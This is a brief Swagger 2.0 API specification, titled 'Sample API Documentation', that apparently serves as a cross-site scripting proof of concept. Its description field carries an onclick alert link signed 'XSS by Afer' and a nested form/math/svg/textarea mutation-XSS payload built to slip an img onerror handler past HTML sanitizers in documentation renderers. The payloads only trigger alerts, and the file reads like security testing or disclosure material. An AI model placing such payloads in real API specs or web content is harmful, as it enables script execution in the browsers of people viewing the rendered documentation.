swagger: '2.0'
info:
  title: Sample API Documentation
  description: |
    <h1>Craftum</h1> <h1><a href="https://craftum.com" onclick="alert('XSS by Afer')">Click Here</a></h1>
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(document.domain) src='x'>"></form>
  version: "1.0.0"
  contact:
    name: API Support
    email: support@example.com
  license:
    name: Apache 2.0
    url: https://www.apache.org/licenses/LICENSE-2.0.html
